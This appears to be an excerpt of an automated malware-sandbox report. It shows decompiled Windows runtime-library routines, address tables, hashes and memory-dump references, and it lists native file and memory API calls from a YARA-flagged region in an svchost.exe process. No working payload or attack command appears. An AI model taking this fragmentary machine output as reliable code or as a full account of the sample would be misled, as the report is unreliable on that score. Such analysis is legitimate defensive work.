				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
									_push(_t144);
									_push(0);
									_t51 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00C94FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00CA3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00CD217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00CA3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00C93915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d301c0;
												_push(_t138);
												_push(0);
												_t58 = E00C4F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00C94FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00CA3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00CA3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00CD217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00CA3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00C93915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00C75384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00C4F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00C93915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00C93915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00C4F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00C93915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00C75329(_t110, _t138);
																_t69 = E00C753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00c9055a
0x00c9055d
0x00c90563
0x00c90566
0x00c905d8
0x00c905e2
0x00c905e5
0x00000000
0x00c905e7
0x00c905e7
0x00c905ea
0x00c905f3
0x00c905f3
0x00c90568
0x00c90568
0x00c90568
0x00c90569
0x00c90569
0x00c90569
0x00c9056b
0x00000000
0x00000000
0x00cb217f
0x00cb2183
0x00cb225b
0x00cb225f
0x00cb2189
0x00cb218c
0x00cb218f
0x00cb2194
0x00cb2199
0x00cb219d
0x00cb21a0
0x00cb21a2
0x00cb21ce
0x00cb21ce
0x00cb21ce
0x00cb21d0
0x00cb21d6
0x00cb21de
0x00cb21e2
0x00cb21e8
0x00cb21e9
0x00cb21ec
0x00cb21f1
0x00cb21f6
0x00000000
0x00000000
0x00cb21f8
0x00cb21fb
0x00cb2206
0x00cb220b
0x00cb220c
0x00cb2217
0x00cb2226
0x00cb222b
0x00cb222c
0x00cb222f
0x00cb2232
0x00cb2235
0x00cb2235
0x00cb223a
0x00cb223f
0x00cb2241
0x00cb2243
0x00cb2248
0x00cb2248
0x00cb224d
0x00cb224f
0x00cb2262
0x00cb2263
0x00cb2268
0x00cb2269
0x00cb2269
0x00cb2269
0x00cb226d
0x00000000
0x00000000
0x00cb2276
0x00cb2279
0x00cb227e
0x00cb2283
0x00cb2287
0x00cb228a
0x00cb228d
0x00cb228f
0x00cb22bc
0x00cb22bc
0x00cb22bc
0x00cb22be
0x00cb22c4
0x00cb22cc
0x00cb22d0
0x00cb22d6
0x00cb22d7
0x00cb22da
0x00cb22df
0x00cb22e4
0x00000000
0x00000000
0x00cb22e6
0x00cb22e9
0x00cb22f4
0x00cb22f9
0x00cb22fa
0x00cb2305
0x00cb2314
0x00cb2319
0x00cb231a
0x00cb231d
0x00cb2320
0x00cb2323
0x00cb2323
0x00cb2328
0x00cb232d
0x00cb232f
0x00cb2331
0x00cb2336
0x00cb2336
0x00cb233b
0x00cb233d
0x00cb2350
0x00cb2351
0x00cb2356
0x00cb2359
0x00cb2359
0x00cb235b
0x00cb235d
0x00c75367
0x00c7536b
0x00c75372
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb2363
0x00cb2363
0x00cb2369
0x00cb236a
0x00cb236c
0x00cb2371
0x00cb2373
0x00000000
0x00cb2379
0x00cb2379
0x00cb237a
0x00cb237f
0x00cb237f
0x00cb2385
0x00cb2386
0x00cb2389
0x00cb238e
0x00cb2390
0x00c75378
0x00c7537c
0x00cb2396
0x00cb2396
0x00cb2397
0x00cb239c
0x00cb23a2
0x00cb23a3
0x00cb23a6
0x00cb23ab
0x00cb23ad
0x00000000
0x00cb23b3
0x00cb23b3
0x00cb23b4
0x00cb23b9
0x00cb23ba
0x00cb23ba
0x00cb23bc
0x00cb23bf
0x00000000
0x00000000
0x00ca9153
0x00ca9158
0x00ca915a
0x00ca915e
0x00ca9160
0x00000000
0x00ca9166
0x00ca9166
0x00ca9171
0x00ca9176
0x00ca9176
0x00000000
0x00ca9160
0x00cb23c6
0x00cb23ce
0x00cb23d7
0x00cb23d7
0x00cb23ad
0x00cb2390
0x00cb2373
0x00cb233f
0x00cb233f
0x00000000
0x00cb233f
0x00cb2291
0x00cb2291
0x00cb2293
0x00cb2295
0x00cb229a
0x00cb22a1
0x00cb22a3
0x00cb22a7
0x00cb22a9
0x00000000
0x00000000
0x00cb22ab
0x00cb22ad
0x00cb22af
0x00000000
0x00000000
0x00000000
0x00cb22af
0x00cb22b1
0x00cb22b4
0x00cb22b4
0x00cb22b6
0x00c753be
0x00c753be
0x00c753be
0x00c753c0
0x00000000
0x00000000
0x00c753cb
0x00c753ce
0x00c753d0
0x00c753d4
0x00c753d6
0x00000000
0x00c753d8
0x00c753e3
0x00c753ea
0x00c753ea
0x00000000
0x00c753d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb22b6
0x00000000
0x00cb228f
0x00cb2349
0x00cb234d
0x00cb2251
0x00cb2251
0x00000000
0x00cb2251
0x00cb21a4
0x00cb21a4
0x00cb21a6
0x00cb21a8
0x00cb21ac
0x00cb21b6
0x00cb21b8
0x00cb21bc
0x00cb21be
0x00000000
0x00000000
0x00cb21c0
0x00cb21c2
0x00cb21c4
0x00000000
0x00000000
0x00000000
0x00cb21c4
0x00cb21c6
0x00cb21c6
0x00cb21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb21c8
0x00cb21a2
0x00000000
0x00cb2183
0x00c9057b
0x00c9057d
0x00c90581
0x00c90583
0x00cb2178
0x00000000
0x00c90589
0x00c9058f
0x00c9058f
0x00c90583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB2206

Strings

RTL: Resource at %p, xrefs: 00CB221D, 00CB230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00CB220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CB22FC
RTL: Re-Waiting, xrefs: 00CB223A, 00CB2328

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
Instruction ID: 93ad5486a5b10546661c951a05a95390dddab6609e178dc802c778adb1581c39
Opcode Fuzzy Hash: 3bb0a6db4643c2f38385e334a65a7356b863ed329525940fd3805efab516142a
Instruction Fuzzy Hash: 32516D357002426FEF14CE58CC82FE633A9AF94725F218269FD64DF285DA31ED828794

Uniqueness

Uniqueness Score: -1.00%

Function 00C914C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00CBEA22

Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C9146B
Part of subcall function 00C913CB: ___swprintf_l.LIBCMT ref: 00C91490

___swprintf_l.LIBCMT ref: 00C9156D

Strings

%%%u, xrefs: 00C91564
]:%u, xrefs: 00CBEA47

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
Instruction ID: 0ae09276fd9825d3f8824fccceeaa9ff5834ee35147f89cc031e5abc7612de02
Opcode Fuzzy Hash: 84390689a668e2daa45113ea1a600f095559f2c79c024a2fd6b9d4b9def321b2
Instruction Fuzzy Hash: E921C37290021A9BCF21EE54CC4AAEF73BCEB50700F5A4161FC56D3141EB70EA589BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00CF3DF3
___swprintf_l.LIBCMT ref: 00CF3E1D
___swprintf_l.LIBCMT ref: 00CF3E46

Strings

%%%u, xrefs: 00CF3E14
]:%u, xrefs: 00CF3E3D

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e80d6e3ef7142b1589f07c68f4e841fec508db103f10fc1720fe2ee676ef388a
Instruction ID: 3e633fa2c8786fa43cd7200481f7eaa6e025d9ce65ba6ccd1b9c9c106f54689d
Opcode Fuzzy Hash: e80d6e3ef7142b1589f07c68f4e841fec508db103f10fc1720fe2ee676ef388a
Instruction Fuzzy Hash: 8821BD76A0022ABBCB60AE699C459FF77ACDF14714F040521FD1893241E7709F8887E2

Uniqueness

Uniqueness Score: -1.00%

Function 00C753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB22F4

Strings

RTL: Resource at %p, xrefs: 00CB230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CB22FC
RTL: Re-Waiting, xrefs: 00CB2328

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
Instruction ID: a6af677decbbb2deddef7e5e6f68afc9d3f6b38bf8382dd3e88eb3e686832f83
Opcode Fuzzy Hash: 1b63457b4deaf5c71dfe2874f75162b31c86ebeeac0627d584e6bce17ace3cdc
Instruction Fuzzy Hash: 115116716007026BEF15DB68DC81FA673DCEF54364F114229FD18DB291EAB1EE4297A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00CB248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00CB24BD
RTL: Re-Waiting, xrefs: 00CB24FA

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 118dd9ee3db51a0732ac70df54db0b3bf6d79c77b3bfd91deddf9e2ae5200582
Instruction ID: 31b86a1ea8e06c1028eacdf533a6933e3f32c405a0027872cb83061dd205c2b7
Opcode Fuzzy Hash: 118dd9ee3db51a0732ac70df54db0b3bf6d79c77b3bfd91deddf9e2ae5200582
Instruction Fuzzy Hash: 22412C71600204AFCB20DFA9CC85FAB77A8EF48320F208655F969DB2D1D734EA419B65

Uniqueness

Uniqueness Score: -1.00%

Function 00C8FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00C8FD94

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: c0b15506f3bd10d7c3d76e74021a868cd45a10dce14495575b107c8aebc02e5d
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 62917F31D0020AEBDF24EFA9C8456EEB7B4FF95308F24807ED411A6162E7705B42DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00D05CFA, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00D05DE8

Strings

0, xrefs: 00D05DBF
$, xrefs: 00D05D36

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: $$0
API String ID: 1302938615-389342756
Opcode ID: 51d41096f13b9afa6c78c4c5a5a66a746660b43a7458b96e1bbd4f3340babe98
Instruction ID: feaea63e02342a41336ead24a839c589310ffcefb4df88e939aad679b761fa0d
Opcode Fuzzy Hash: 51d41096f13b9afa6c78c4c5a5a66a746660b43a7458b96e1bbd4f3340babe98
Instruction Fuzzy Hash: 7C915E70D0468A9EDF24CF99E4453EEBBB1AF41310F18469AECA9A72D5C3748A41CF70

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 2608 Parent PID: 1764 svchost.exeCOMMON

Executed Functions

Function 000985E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009862D

Strings

.z`, xrefs: 0009861D, 00098628

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d974947f8607c91641fad38be63367c11d58baecb07bae07d4dd1839b0465e92
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: EAF0BDB2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00098690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:,FFFFFFFF,?,r=,?,00000000), ref: 000986D5

Strings

1:, xrefs: 000986AC, 000986B8

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: 1:
API String ID: 2738559852-2258448488
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f86b8a76bd5ff8a18cb67fcf4e6483e26bbf775c6d3bc2927acef1de83101bc1
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 77F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BE1D97251D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=,?,?,00093D50,00000000,FFFFFFFF), ref: 00098735

Strings

P=, xrefs: 0009872C, 00098734

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: P=
API String ID: 3535843008-2160658360
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: de9062268f43dde2ecf1bcf197ce4dd98b4428d4faa0f9dc1cc7191afb5d3919
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: A3D01776200214ABDB10EBD8CC89EE77BACEF48760F154499BA189B242C530FA00C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000987C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000987F9

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 905e30491a69e896788ec325e9b6d3cf8735d1c684a77d8412869ee1a2058102
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 66F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148FE0897241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000987C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000987F9

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction ID: 52a3a31bce263a2475bd5263f460998274f000d1abcedc809903811f91db9422
Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction Fuzzy Hash: CFF015B2200108AFCB14DF88CC80EEB77A9AF88350F118248FE0897241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A300CF

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
